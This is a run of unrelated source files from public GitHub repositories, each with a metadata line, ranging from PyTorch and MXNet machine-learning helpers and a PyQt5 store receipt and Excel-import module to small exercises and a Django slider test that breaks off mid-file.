EOS_token = 1
hp = hparams()
device = hp.device
class Lang:
def __init__(self, name):
self.name = name
self.word2index = {}
self.word2count = {}
self.index2word = {0: "SOS", 1: "EOS"}
self.n_words = 2 # SOS 와 EOS 포함
def addSentence(self, sentence):
for word in sentence.split(' '):
self.addWord(word)
def addWord(self, word):
if word not in self.word2index:
self.word2index[word] = self.n_words
self.word2count[word] = 1
self.index2word[self.n_words] = word
self.n_words += 1
else:
self.word2count[word] += 1
def readLangs(lang1, lang2):
# 파일을 읽고 줄로 분리
lines = open('data/%s-%s.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\n')
# 모든 줄을 쌍으로 분리하고 정규화
pairs = [[s for s in l.split('\t')] for l in lines]
# 영어와 프랑스어의 순서를 바꿔주기
pairs = [list(reversed(p)) for p in pairs]
input_lang = Lang(lang2)
output_lang = Lang(lang1)
return input_lang, output_lang, pairs
def prepareData(lang1, lang2):
input_lang, output_lang, pairs = readLangs(lang1, lang2)
for pair in pairs:
input_lang.addSentence(pair[0])
output_lang.addSentence(pair[1])
max_len = getMAXLENGTH(pairs)
return input_lang, output_lang, pairs, max_len
def getMAXLENGTH(s):
length=set()
for input_lang, output_lang in s :
length.add(len(input_lang.split()))
length.add(len(output_lang.split()))
return max(length)+1
def indexesFromSentence(lang, sentence):
# UNK 처리 완료
return [lang.word2index[word] if word in lang.word2index else lang.n_words-1 for word in sentence.split(' ')]
def tensorFromSentence(lang, sentence, device):
indexes = indexesFromSentence(lang, sentence)
indexes.append(EOS_token)
return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)
def tensorsFromPair(input_lang, output_lang, pair, device):
input_tensor = tensorFromSentence(input_lang, pair[0], device=device)
target_tensor = tensorFromSentence(output_lang, pair[1], device=device)
return (input_tensor, target_tensor)
def loading_test_data(lang1, lang2) :
lines = open('data/%s-%s_test.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\n')
pairs = [[s for s in l.split('\t')] for l in lines]
pairs = [list(reversed(p)) for p in pairs]
return pairs
if __name__ == "__main__" :
input_lang, output_lang, pairs, max_len = prepareData('eng', 'fra')
print(random.choice(pairs)) | lmhljhlmhljh/pytorch_practice | RNNATTENTION/dataset.py | dataset.py | py | 3,050 | python | en | code | 1 | github-code | 13 |
17464098832 | # -*- coding: utf-8 -*-
"""
__author__ = 'sunny'
__mtime__ = '2017/2/13'
# code is far away from bugs with the god animal protecting
I love animals. They taste delicious.
┏┓ ┏┓
┏┛┻━━━┛┻┓
┃ ☃ ┃
┃ ┳┛ ┗┳ ┃
┃ ┻ ┃
┗━┓ ┏━┛
┃ ┗━━━┓
┃ ┣┓
┃ ┏┛
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
"""
import json
import logging
import re
from collections import OrderedDict
from collections import defaultdict
from datetime import datetime
import requests
import xlrd
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtPrintSupport import QPrinter, QPrintPreviewDialog
from PyQt5.QtWidgets import *
from common import config
from common.common import cncurrency
from common.exception import ApiException
from common.static_func import get_uuid1, ErrorCode
from common.config import domain, connect as myconnect
from common.time_utils import get_now
from controller import DbHandler
from database.dao.customer.customer_handler import check_customer
from database.dao.sale import sale_handler
from database.dao.sale.sale_handler import get_sale_info_by_one_key
dbhelp = DbHandler.DB_Handler()
selectOrderNo = None
logger = logging.getLogger(__name__)
def do_printer(mainWin, orderNo):
try:
printer = QPrinter(QPrinter.HighResolution)
# /* 打印预览 */
preview = QPrintPreviewDialog(printer, mainWin)
preview.paintRequested.connect(print_html)
global selectOrderNo
selectOrderNo = orderNo
preview.exec_()
return True
except Exception as print_exception:
print(print_exception)
return False
def print_html(printer):
try:
if not myconnect:
raise ApiException(ErrorCode.ErrorRequest)
code = config.get_local_register_code()
url = domain + "store/api/detail?code={}".format(code)
req = requests.get(url=url)
result_data = json.loads(req.text)
except Exception as e:
logger.error(e.__str__())
store = config.get_local_store_info()
result_data = {
'data': {
"pcId": store.id(),
"pcPhone": store.phone(),
"pcAddress": store.address(),
"pcSign": store.name(),
},
'code': 200
}
mustSet = ['数量', '单价', '小计', '总价', '单位', '备注']
if result_data.get("code") != 200:
storeName = ""
pcAddress = ""
pcPhone = ""
else:
storeName = result_data.get("data").get("pcSign", "")
pcAddress = result_data.get("data").get("pcAddress", "")
pcPhone = result_data.get("data").get("pcPhone", "")
result = get_sale_info_by_one_key("orderCheckId", selectOrderNo)
font_size = config.get_print_font_size()
# *{font-size:65px;}
if result:
header = """<html>
<style>
table{
background-color:#000000;
}
.linetd{
text-align: center;
width: 820px;
color: red;
height: 30px;
}
.halftd{
width: 410px;
}
#content{
text-align: center;
position: relative;
top: 50%;
transform: translateY(-50%);
}
td{
padding:2px;
align:center;
border:1px solid black;
background-color:#ffffff
}
""" + "*{font-size:" + str(font_size) + "pt;}" + ".bigWord{font-size:" + str(
font_size * 1.5) + "pt;}" + "</style><head></head>"
# *{font-size:50px;}
tdWidth = 19
body = """
<body style="text-align: center;">
<table width=100% CELLPADDING="0" CELLSPACING="1" border="0">
<tr>
<td class="bigWord" align="center" colspan="100" width="100%">
{storeName}
</td>
</tr>
<tr>
<td colspan="50">车牌号:{carId}</td>
<td colspan="50">销售日期:{createdTime}</td>
</tr>
<tr>
<td colspan="50">客户电话:{carPhone}</td>
<td colspan="50">销售单号:<span style="">{orderNo}</span></td>
</tr>
<tr>
<td colspan="100" height="20px"> </td>
</tr>
""".format(storeName=storeName, carId=result[0][2], createdTime=result[0][0], carPhone=result[0][4],
orderNo=result[0][1])
content = ""
xuhao = 1
zongjia = 0
page = 0
pageHeight = 100
for order in result:
page += 1
attribute = json.loads(order[8])
baseHeight = 180
# 手动排序
# mustSet = ['数量','单价','小计','总价','单位','备注']
# 去除mustset后的必然顺序为:"品牌","型号","工时费","更换里程"
# 后面用字符串排序key来排序
tempKeyList2 = ["品牌", "型号", "工时费", "更换里程"]
tempKeyList = list()
for t in tempKeyList2:
if attribute.get(t) and attribute.get(t) != '-':
tempKeyList.append(t)
for k, v in attribute.items():
if k not in mustSet + ["品牌", "型号", "工时费", "更换里程"] and v != "-" and v != "" and k != "检索ID":
tempKeyList.append(k)
tempKeyList.sort()
noMustSet = OrderedDict()
for k in tempKeyList:
noMustSet[k] = attribute.get(k)
# 总长度要减去备注和名称,因为名称长度另外设置,备注不打印
td = ""
keyDict = dict()
i = 0
j = 0
tdList = list()
keyList = list()
pageHeight += int(len(noMustSet.keys()) / 5 + 1) * 60 + baseHeight
for k, v in noMustSet.items():
# if k not in mustSet and v != "-" and v != "" and k!="检索ID" :
td += "<td colspan=\"{tdWidth}\" align=\"center\"><b>{key}</b></td>".format(tdWidth=tdWidth, key=k)
keyList.append(k)
if i >= 4:
i = 0
tdList.append(td)
td = ""
keyDict[j] = keyList
keyList = list()
j += 1
else:
i += 1
# 补齐
if keyList:
if len(keyList) < 5:
num = len(keyList)
for i in range(5 - num):
keyList.append("")
td += "<td colspan=\"{tdWidth}\" align=\"center\"></td>".format(tdWidth=tdWidth)
tdList.append(td)
keyDict[j] = keyList
# 序号合并列数
xuNum = len(tdList) * 2 + 2
# createdTime,orderNo,carId,carUser,carPhone,carModel,workerName,project,brand," \
# "model,huawen,number,unitPrice,xiaoji,gongshi,ghlc,remark,totalPrice,pcId,unit
content += """
<tr>
<td colspan="5" align="center"><b>序</b></td>
<td colspan="{tdWidth}" align="center"><b>名称</b></td>
<td colspan="{tdWidth}" align="center"><b>单位</b></td>
<td colspan="{tdWidth}" align="center"><b>数量</b></td>
<td colspan="{tdWidth}" align="center"><b>单价</b></td>
<td colspan="{tdWidth}" align="center"><b>小计</b></td>
</tr>
<tr>
<td rowspan="{xuNum}" colspan="5" align="center"><br/>{xuhao}</td>
<td colspan="{tdWidth}" align="center">{project}</td>
<td colspan="{tdWidth}" align="center">{unit}</td>
<td colspan="{tdWidth}" align="center">{number}</td>
<td colspan="{tdWidth}" align="center">{unitPrice}</td>
<td colspan="{tdWidth}" align="center">{xiaoji}</td>
</tr>
""".format(xuNum=xuNum, xuhao=xuhao, unit=attribute.get("单位", ""), number=attribute.get("数量", ""),
unitPrice=attribute.get("单价", ""),
xiaoji=attribute.get('小计', ""), project=order[7], tdWidth=tdWidth)
moreContent = ""
ii = 0
for td in tdList:
# 先放入表头
moreContent += "<tr>" + td + "</tr>"
# 再放入内容
moreContent += """
<tr>
<td colspan="{tdWidth}" align="center">{one}</td>
<td colspan="{tdWidth}" align="center">{two}</td>
<td colspan="{tdWidth}" align="center">{three}</td>
<td colspan="{tdWidth}" align="center">{four}</td>
<td colspan="{tdWidth}" align="center">{five}</td>
</tr>
""".format(tdWidth=tdWidth, one=attribute.get(keyDict[ii][0], ""),
two=attribute.get(keyDict[ii][1], ""),
three=attribute.get(keyDict[ii][2], ""), four=attribute.get(keyDict[ii][3], ""),
five=attribute.get(keyDict[ii][4], ""))
ii += 1
fenge = """
<tr>
<td colspan="100" height="20px"> </td>
</tr>
"""
zongjiaconetent = """
<tr>
<td colspan="95">总价:{zongjia}</td>
</tr>
""".format(zongjia=attribute.get('总价', ""))
content += moreContent + zongjiaconetent + fenge
xuhao += 1
try:
zongjia += float(attribute.get('总价', 0))
except:
zongjia = 0
zongjia = str(zongjia)
cn = cncurrency(zongjia)
foot = """
<tr>
<td style="height:35px" colspan="70">合计人名币(大写):{cn}</td>
<td style="height:35px" colspan="30">小写:{zongjia}</td>
</tr>
<tr>
<td colspan="30">{storeName}</td>
<td colspan="35">地址:{pcAddress}</td>
<td colspan="35">联系电话:{pcPhone}</td>
</tr>
</table>
</body>
</html>
""".format(cn=cn, zongjia=zongjia, storeName=storeName, pcPhone=pcPhone, pcAddress=pcAddress)
html = header + body + content + foot
textDocument = QTextDocument()
textDocument.setHtml(html)
textDocument.setDocumentMargin(35)
printer.setPageSize(QPrinter.Custom)
# height = baseHeight+((page-1)*150)
# printer.setPaperSize(QSizeF(printer.logicalDpiX()*(86/25.4),height),QPrinter.Point)
# textDocument.setPageSize(QSizeF(printer.logicalDpiX()*(86/25.4),height))
printer.setPaperSize(QSizeF(581, pageHeight), QPrinter.Point)
textDocument.setPageSize(QSizeF(581, pageHeight))
textOp = QTextOption()
textOp.setWrapMode(QTextOption.WrapAnywhere)
textOp.setAlignment(Qt.AlignCenter)
textDocument.setDefaultTextOption(textOp)
printer.setOutputFormat(QPrinter.NativeFormat)
textDocument.print(printer)
def ImportExcel(fileName, self):
# 用于正则判断是否是用软件导出的excel文档
pattern = re.compile(r"^门店系统:\d{4}[-/]\d{2}[/-]\d{2}至\d{4}[-/]\d{2}[/-]\d{2}$")
# matchs = pattern.match()
bk = xlrd.open_workbook(fileName)
try:
sh = bk.sheet_by_name("消费列表")
except:
sh = bk.sheet_by_name("Sheet1")
nrows = sh.nrows
temp = list()
titleList = ['检索ID', 'orderNo', 'createdTime', "pcSign", "carId", "carUser", "carPhone", "carModel", "workerName",
"project"]
userList = ["carId", "carUser", "carPhone", "carModel"]
mustlen = len(titleList)
check = str(sh.row_values(0)[0])
matchs = pattern.match(check)
title = sh.row_values(1)
progress_dialog = QProgressDialog(self)
progress_dialog.setWindowTitle("导入中")
progress_dialog.setWindowModality(Qt.WindowModal)
progress_dialog.setMinimumDuration(4)
progress_dialog.setWindowTitle(self.tr("请等待"))
progress_dialog.setLabelText(self.tr("导入中..."))
progress_dialog.setCancelButtonText(self.tr("取消"))
progress_dialog.setRange(0, nrows - 3)
progress_dialog.show()
if True:
p = 0
msgList = list()
for i in range(2, nrows):
# 用正则表达式判断第一行数据内容,从而判断是否用软件导出的EXCEL文档
if matchs:
# 若是用软件导出的则
if progress_dialog.wasCanceled():
break
progress_dialog.setValue(p)
p += 1
try:
# if True:
saveData = dict()
row_data = sh.row_values(i)
if i < nrows - 1:
temp2 = sh.row_values(i + 1)
else:
temp2 = None
if temp2 != None and temp2[0] == '':
# 合并了单元格则合并内容是空,将后面不是空的内容进行缓存,合并的内容会在最后一条信息中显示,
# 此时一并进行录入
temp.append(row_data)
else:
# if row_data[0] != '':
if temp:
orderCheckId = temp[0][0]
else:
orderCheckId = row_data[0]
checkOrder = get_sale_info_by_one_key("orderCheckId", orderCheckId)
# 有此订单的就不保存了
if not checkOrder:
if temp:
temp.append(row_data)
allMsg = temp[0]
# 接入信息后录入
for i in range(len(temp)):
if i != 0:
msg = temp[i]
attribute = {}
for ki in range(len(title)):
allMsg[ki] = str(allMsg[ki])
msg[ki] = str(msg[ki])
if ki < mustlen:
tempK = titleList[ki]
if tempK in ['orderNo', 'carPhone']:
allMsg[ki] = allMsg[ki].replace('.0', "")
msg[ki] = msg[ki].replace('.0', "")
if titleList[ki] in ["project"]:
saveData[tempK] = msg[ki]
else:
if tempK == "检索ID":
tempK = "orderCheckId"
saveData[tempK] = allMsg[ki]
else:
if row_data[ki] == "" or row_data[ki] == "-":
continue
attribute[title[ki]] = msg[ki]
saveData['attribute'] = json.dumps(attribute)
saveData['id'] = get_uuid1()
dbhelp.add_sale_info(saveData)
row_data = allMsg
attribute = {}
userSave = {}
for ki in range(len(title)):
row_data[ki] = str(row_data[ki])
if ki < mustlen:
if titleList[ki] in ['orderNo', 'carPhone']:
row_data[ki] = row_data[ki].replace('.0', "")
key = titleList[ki]
if key == "检索ID":
key = "orderCheckId"
saveData[key] = row_data[ki]
# 保存用户信息
if key in userList:
userSave[key] = row_data[ki]
else:
if row_data[ki] == "" or row_data[ki] == "-":
continue
attribute[title[ki]] = row_data[ki]
user = check_customer(userSave.get("carPhone"), userSave.get("carId"))
if not user:
# 没有此用户则添加
key = "userName,carPhone,carModel,carId,createdTime"
value = "'{}','{}','{}','{}','{}'".format(userSave.get("carUser"),
userSave.get("carPhone"),
userSave.get("carModel"),
userSave.get("carId"), get_now())
try:
# pass
dbhelp.InsertData("User", key, value)
except:
pass
saveData['attribute'] = json.dumps(attribute)
saveData['id'] = get_uuid1()
sale_handler.add_sale_info(saveData)
# 清空缓存
temp = list()
# if i == nrows - 1:
# 此时是最后一组,则要进行录入
# else:
# #合并了单元格则合并内容是空,将后面不是空的内容进行缓存,合并的内容会在最后一条信息中显示,此时一并进行录入
# temp.append(row_data)
except:
continue
else:
# 若不是用软件导出的EXCEL文档则
# for i in range(2,nrows):
# 先整理参数,全部变成列表,列表里面是字典,字典的key就是title
try:
row_data = sh.row_values(i)
tempData = dict()
for k in range(len(title)):
tempData[title[k]] = row_data[k]
msgList.append(tempData)
except:
continue
if not matchs:
saveList = defaultdict(list)
for msg in msgList:
if not msg.get("消费时间") or not msg.get("车牌号"):
continue
key = msg.get("消费时间") + msg.get("车牌号")
saveList[key].append(msg)
# 插入信息
must = ["订单号", "接待门店", "车牌号", "车主姓名", "联系电话", "车型", "操作人员", "消费项目", "消费时间"]
for k, v in saveList.items():
if progress_dialog.wasCanceled():
break
progress_dialog.setValue(p)
p += 1
orderCheckId = get_uuid1()
# 对同一个订单进行录入
userSave = {}
for tempDict in v:
orderNo = str(tempDict.pop("订单号")) if tempDict.get("订单号", "") != "" else "-"
pcSign = tempDict.pop("接待门店", "") if tempDict.get("接待门店", "") != "" else "-"
carId = tempDict.pop("车牌号") if tempDict.get("车牌号") != "" else "-"
carUser = tempDict.pop("车主姓名", "") if tempDict.get("车主姓名", "") != "" else "-"
carPhone = str(tempDict.pop("联系电话", "-")).replace(".0", "") if tempDict.get("联系电话",
"") != "" else "-"
carModel = tempDict.pop("车型", "") if tempDict.get("车型", "") != "" else "-"
workerName = tempDict.pop("操作人员", "") if tempDict.get("操作人员", "") != "" else "-"
project = tempDict.pop("消费项目", "") if tempDict.get("消费项目", "") != "" else "-"
createdTime = str(tempDict.pop("消费时间")).replace(".", "-")
# 保存用户信息
userSave["carId"] = carId if carId != '-' else ""
userSave["carUser"] = carUser if carUser != '-' else ""
userSave["carPhone"] = (carPhone if carPhone != '-' else "").replace(".0", "")
userSave['carModel'] = carModel if carModel != '-' else ""
if orderNo != "-":
checkOrder = get_sale_info_by_one_key("orderNo", orderNo)
if checkOrder:
break
saveData = {
"orderNo": orderNo.replace(".0", ""),
"createdTime": createdTime,
"pcSign": pcSign,
"carId": carId,
"carUser": carUser,
"carPhone": carPhone,
"carModel": carModel,
"workerName": workerName,
"project": project,
"orderCheckId": orderCheckId,
"id": get_uuid1(),
}
tempAttribute = tempDict
attribute = dict()
for k, v in tempAttribute.items():
if k not in must:
if v == "":
# v = '-'
continue
attribute[k] = str(v)
try:
gsf = float(attribute.get("工时费")) if attribute.get("工时费") != "" else 0
sl = float(attribute.get("数量")) if attribute.get("数量") != "" else 0
dj = float(attribute.get("单价")) if attribute.get("单价") != "" else 0
attribute["总价"] = gsf + sl * dj
except:
pass
saveData["attribute"] = json.dumps(attribute)
dbhelp.add_sale_info(saveData)
if userSave.get("carId") and userSave.get("carPhone"):
# 当有用户信息的时候判断是否需要自动添加
user = check_customer(userSave.get("carPhone"), userSave.get("carId"))
if not user:
# 没有此用户则添加
key = "userName,carPhone,carModel,carId,createdTime"
value = "'{}','{}','{}','{}','{}'".format(userSave.get("carUser"), userSave.get("carPhone"),
userSave.get("carModel"), userSave.get("carId"),
get_now())
try:
# pass
dbhelp.InsertData("User", key, value)
except:
pass
# 最后全部导入
progress_dialog.setValue(nrows - 3)
progress_dialog.close()
def ImportMenuExcel(fileName, mustSet):
bk = xlrd.open_workbook(fileName)
sh = bk.sheet_by_name("菜单列表")
nrows = sh.nrows
temp = defaultdict(list)
for i in range(1, nrows):
row_data = sh.row_values(i)
menu1 = row_data[0]
menu2 = row_data[1]
if menu1 not in temp:
temp[menu1] = [menu2]
else:
temp[menu1].append(menu2)
menu = dbhelp.getOneMenu()
menuList = list()
menuOneKey = dict()
for data in menu:
menuList.append(data[1])
menuOneKey[data[1]] = data[0]
key = "name,createdTime"
now = datetime.now()
attribute = ""
attributeState = ""
for t in mustSet:
attribute += "{},".format(t)
attributeState += "1,"
attribute = attribute[:-1]
attributeState = attributeState[:-1]
for k in temp:
if k not in menuList:
value = "\'{}\',\'{}\'".format(k, now)
menuId = dbhelp.InsertData("OneMenu", key, value)
for menu2 in temp[k]:
saveData = {
"father": menuId,
"name": menu2,
"attribute": attribute,
"attributeState": attributeState,
"createdTime": now
}
dbhelp.InsertTwoMenu(saveData)
else:
if menuOneKey.get(k):
menuId = menuOneKey.get(k)
for menu2 in temp[k]:
saveData = {
"father": menuId,
"name": menu2,
"attribute": attribute,
"attributeState": attributeState,
"createdTime": now
}
try:
dbhelp.InsertTwoMenu(saveData)
except:
pass
| zgj0607/Py-store | controller/view_service/view_service.py | view_service.py | py | 27,490 | python | en | code | 3 | github-code | 13 |
15710019861 | import tkinter as tk
from CharacterInfo import CharacterInfo
import UI
class IntroUIFirstPage(tk.Frame):
def __init__(self, parent, root):
tk.Frame.__init__(self, parent, background="white")
self.parent = parent
self.root = root
self.characterInfo = CharacterInfo()
self.nameSet = False
self.backgroundSet = False
self.characteristicSet = False
def displayUI(self):
def nameCallback():
name = nameEntry.get()
if(len(name) != 0):
self.characterInfo.setCharacterName(nameEntry.get())
name = self.characterInfo.getCharacterName()
self.root.title("Character Sheet for " + name)
self.nameSet = True
self.updateNextButton()
def storyCallback():
text = "You are ready to enter the world of Hogwarts!"
UI.createMessage(self, text)
UI.createWhiteSpace(self)
welcomeMessage = "Welcome to the wizarding world! What is your name?"
UI.createMessage(self, welcomeMessage)
nameEntry = UI.createEntryField(self, "Set name", nameCallback)
UI.createWhiteSpace(self)
storyMessage1 = "Enter your story below "
storyMessage2 = "or simply tell the GM about your life so far."
UI.createMessage(self, storyMessage1 + storyMessage2)
size = UI.bodyWidth(self.root)
text = "I'm finished!"
UI.createMultiLineEntryField(self, text, size, size, storyCallback)
# in future will need to assign the above to some variable and send it
# to the character manager
def updateNextButton(self):
def moveToPageTwo():
self.parent.displayNextPage()
for widget in self.winfo_children():
widget.destroy()
if(self.nameSet is True):
UI.createNextButton(self, moveToPageTwo)
| xooberon/harry-potter-game | IntroUIFirstPage.py | IntroUIFirstPage.py | py | 1,920 | python | en | code | 0 | github-code | 13 |
42235205938 | import os,warnings,json,shutil
from bs4 import BeautifulSoup
warnings.filterwarnings("ignore")
base_path=os.getcwd()
os.chdir('data/')
listdir=os.listdir()
def make_json(path,name,ep,ii):
json_dict={
"settings": {"reportId":ii},
"offline": {
"instance": name,"epUri": ep,"taxLocationRoot": "2023-03-31"
},"orderList": [
{
"order": 0,"command":{
"name": "controlCore",
"renderingType": "file",
"stopIfError": "false",
"stepOverIfErrorLoadInstance": "true",
"filterList": ["enum2"]
}
}
]
}
with open(f'{path}\\jsons\\{ii}.json', 'w',) as f:
json.dump(json_dict, f,ensure_ascii=False, indent=4)
i=0
run_str='chcp 65001\nset JAVA=java\n'
for xx in listdir:
print(xx)
i += 1
with open(xx,'r',encoding='utf-8') as f:
file_data=f.read()
soup=BeautifulSoup(file_data,'lxml')
soup_root=soup.contents[1]
if soup_root.find_next('xbrl'):
ep = soup_root.find_next('xbrl').find('link:schemaref')['xlink:href']
else:
ep = soup_root.find_next('xbrli:xbrl').find('link:schemaref')['xlink:href']
ii=f'{i}'
run_str=run_str+f"%JAVA% -Xms2048M -Xmx32000M -Dfile.encoding=UTF-8 -jar xwand7-adapter.jar --launch {ii} --config {ii}.json > {ii}.log 2>&1\n"
make_json(base_path,xx,ep,ii)
path_folder=f'{base_path}\\datas\\{ii}\\'
os.mkdir(f'{base_path}\\datas\\{ii}\\')
shutil.copy2(xx, f'{path_folder}\\{xx}')
run_str=run_str+'pause'
os.chdir(base_path)
with open(f'run_enum.bat','w') as r:
r.write(run_str) | TakunNineone/makePackageForXW7Server | main.py | main.py | py | 1,459 | python | en | code | 0 | github-code | 13 |
11080034904 | your_age = input("Enter your current age (years): ")
wife_age = input("Enter your wife's age (years): ")
your_life = 90 - int(your_age)
wife_life = 90 - int(wife_age)
your_month = your_life * 12
wife_month = wife_life * 12
your_week = your_life * 52
wife_week = wife_life * 52
your_day = your_life * 365
wife_day = wife_life * 365
month_together = your_month if your_month < wife_month else wife_month
day_together = your_day if your_day < wife_day else wife_day
week_together = your_week if your_week < wife_week else wife_week
print(
"If you and your wife both live for 90 years,\n"
f"You have {your_day} days or {your_week} weeks or {your_month} months left.\n"
f"Your wife has {wife_day} days or {wife_week} weeks or {wife_month} months left.\n"
f"You and your wife can live together for {day_together} days or {week_together} weeks or {month_together} months"
) | aburifat/Small-Python-Projects | 003_90_years_to_live.py | 003_90_years_to_live.py | py | 889 | python | en | code | 0 | github-code | 13 |
17382034900 | import numpy as np
import energy
import findSeam
import reduceImage
def findTranspose(image, shapeReduction):
'''
Compute the bitmask which gives the order in which the seams must be removed.
Parameters:
image: Image to be reduced.
shapeReduction: Tuple with 2 elements reduction in rows and columns.
Returns:
T: The matrix for dynamic programing.
bitMask: Order in which the rows/columns need to be removed.
'''
T = np.zeros((shapeReduction[0]+1, shapeReduction[1]+1), dtype='double')
bitMask = np.ones_like(T) * -1
# Removing horizontal seams
imageNoRow = image
for i in range(1, T.shape[0]):
e = energy.energyRGB(imageNoRow)
optSeamMask, seamEnergyRow = findSeam.findSeam(e.T)
imageNoRow = reduceImage.reduceImageByMask(imageNoRow, optSeamMask, 0)
bitMask[i, 0] = 0
T[i, 0] = T[i - 1, 0] + seamEnergyRow
# Removing veertical seams
imageNoColumn = image
for j in range(1, T.shape[1]):
e = energy.energyRGB(imageNoColumn)
optSeamMask, seamEnergyColumn = findSeam.findSeam(e)
imageNoColumn = reduceImage.reduceImageByMask(imageNoColumn, optSeamMask, 1)
bitMask[0, j] = 1
T[0, j] = T[0, j - 1] + seamEnergyColumn
# Computing the T matrix using dynamic programming
for i in range(1, T.shape[0]):
imageWithoutRow = image
for j in range (1, T.shape[1]):
e = energy.energyRGB(imageWithoutRow)
# Finding seam and seamEnergy in horizontal dierction
optSeamMaskRow, seamEnergyRow = findSeam.findSeam(e.T)
imageNoRow = reduceImage.reduceImageByMask(imageWithoutRow, optSeamMaskRow, 0)
# Finding seam and seamEnergy in verticlal direction
optSeamMaskColumn, seamEnergyColumm = findSeam.findSeam(e)
imageNoColumn = reduceImage.reduceImageByMask(imageWithoutRow, optSeamMaskColumn, 1)
# Choosing the minimum cost option
neighbors = [(T[i - 1, j] + seamEnergyRow), (T[i, j - 1] + seamEnergyColumn)]
val = np.min(neighbors)
ind = np.argmin(neighbors)
T[i, j] = val # Updating T
bitMask[i, j] = ind # Updating bitMask
imageWithoutRow = imageNoColumn
e = energy.energyRGB(image)
[optSeamMaskRow, seamEnergyRow] = findSeam.findSeam(e.T)
image = reduceImage.reduceImageByMask(image, optSeamMaskRow, 0)
return T, bitMask | PabitraBansal/Content-Aware-Image-Resizing | findTranspose.py | findTranspose.py | py | 2,556 | python | en | code | 0 | github-code | 13 |
9216063877 | # -*- coding: utf-8 -*-
# _author_ = 'hou'
# _project_: add_layer
# _date_ = 16/10/23 下午1:35
# about matrix multply: http://baike.baidu.com/view/2455255.htm
import tensorflow as tf
# activation_function=None : means 为线性函数
def add_layer(inputs, in_size, out_size, activation_function=None):
# Weights = tf.Variable(tf.random_normal([in_size, out_size]))
# biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)
Weights = tf.Variable(tf.zeros([in_size, out_size]))
biases = tf.Variable(tf.zeros([out_size]))
res = tf.matmul(inputs, Weights) + biases
if activation_function is None:
outputs = res
else:
outputs = activation_function(res)
return outputs
| houweitao/TensorFlow | tensorFlowStudy/add_layer.py | add_layer.py | py | 715 | python | en | code | 0 | github-code | 13 |
16679842785 | import numpy as np
import cv2
import mxnet as mx
import argparse
import os
import time
start = time.time()
path = "/Users/p439/Desktop/CapOFF/"
saved_model_path = os.getcwd() + "/saved_model/"
prefix = saved_model_path + 'mymodel-new-ft'
ctx = mx.cpu()
batch_size = 1
epoch = 130
net, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
net_model = mx.mod.Module(symbol = net, context = ctx)
def handler(iter, _ctx):
for img in iter:
img = cv2.resize(img, (32,32)) # resize to 224*224 to fit model
img = img.reshape([1,32,32])
img = img[np.newaxis, :] # extend to (n, c, h, w)
img_iter = mx.io.NDArrayIter(img, None, batch_size)
net_model.bind(for_training = False, data_shapes = img_iter.provide_data, label_shapes = None)
net_model.set_params(arg_params, aux_params, allow_missing = True)
predicted = net_model.predict(img_iter, 1)
output = []
for list in predicted:
if list[0] == max(list[0],list[1]):
output.append('CapOFF')
elif list[1] == max(list[0],list[1]):
output.append('CapON')
else:
output.append('Nothing')
return output, predicted
if __name__ == '__main__':
image = path + "img208.jpg"
img = cv2.cvtColor(cv2.imread(image), cv2.COLOR_BGR2GRAY)
print(handler([img],None))
print(time.time() - start)
| khan-farhan/Capon-Vs-Capoff | main.py | main.py | py | 1,443 | python | en | code | 0 | github-code | 13 |
3108079836 | """
In this exercise you will create a program that reads a letter of the alphabet from the user.
If the user enters a, e, i, o or u then your program should display a message
indicating that the entered letter is a VOWEL.
If the user enters y then your program should display a message
indicating that sometimes y is a VOWEL, and sometimes y is a CONSONANT.
Otherwise your program should display a message indicating that the letter is a CONSONANT.
"""
# START Definition of FUNCTIONS
def stringaValida(stringInput):
if stringInput != "":
for char in stringInput:
if not((65 <= ord(char) <= 90) or (97 <= ord(char) <= 122)):
return False
return True
def vowelOrConsonant(char):
if char == "A" or char == "E" or char == "I" or char == "O" or \
char == "U" or char == "a" or char == "e" or char == "i" or \
char == "o" or char == "u":
return "Vowel"
elif char == "Y" or char == "y":
return "Sometimes Vowel, sometimes Consonant"
else:
return "Consonant"
# END Definition of FUNCTIONS
# Acquisition and Control of the DATA entered by the USER
stringInput = input("Enter the WORD: ")
stringInputValidated = stringaValida(stringInput)
while not(stringInputValidated):
print("Incorrect entry. Try again.")
stringInput = input("Enter the WORD: ")
stringInputValidated = stringaValida(stringInput)
# Displaying the RESULTS
for char in stringInput:
result = vowelOrConsonant(char)
print(f'{char} = {result}')
| aleattene/python-workbook | chap_02/exe_037_vowel_consonant.py | exe_037_vowel_consonant.py | py | 1,541 | python | en | code | 1 | github-code | 13 |
8841879388 | import os
from datetime import timedelta
from django.conf import settings
from django.core.files.storage import default_storage
from django.test import override_settings
from django.test import TestCase
from django.utils.timezone import now
from djmoney.money import Money
from helpers.seed import get_or_create_default_image
from slider.models import Slide
from slider.models import Slider
languages = [lang["code"] for lang in settings.PARLER_LANGUAGES[settings.SITE_ID]]
default_language = settings.PARLER_DEFAULT_LANGUAGE_CODE
@override_settings(
STORAGES={
"default": {
"BACKEND": "django.core.files.storage.memory.InMemoryStorage",
},
}
)
class SlideModelTestCase(TestCase):
slide: Slide = None
slider: Slider = None
def setUp(self):
image = get_or_create_default_image("uploads/slides/no_photo.jpg")
date_start = now()
self.slider = Slider.objects.create()
self.slide = Slide.objects.create(
discount=0.0,
show_button=True,
image=image,
date_start=date_start,
date_end=date_start + timedelta(days=30),
slider=self.slider,
)
for language in languages:
self.slide.set_current_language(language)
self.slide.name = f"Slide 1_{language}"
self.slide.url = "https://www.example.com/"
self.slide.title = f"Slide Title_{language}"
self.slide.description = f"Slide Description_{language}"
self.slide.button_label = f"Slide Button Label_{language}"
self.slide.save()
self.slide.set_current_language(default_language)
def test_fields(self):
# Test if the fields are saved correctly
self.assertEqual(self.slide.discount, Money("0.0", settings.DEFAULT_CURRENCY))
self.assertTrue(self.slide.show_button)
self.assertTrue(default_storage.exists(self.slide.image.path))
def test_verbose_names(self):
# Test verbose names for fields
self.assertEqual(
Slide._meta.get_field("image").verbose_name,
"Image",
)
self.assertEqual(
Slide._meta.get_field("discount").verbose_name,
"Discount",
)
self.assertEqual(
Slide._meta.get_field("show_button").verbose_name,
"Show Button",
)
def test_meta_verbose_names(self):
# Test verbose names from the Meta class
self.assertEqual(
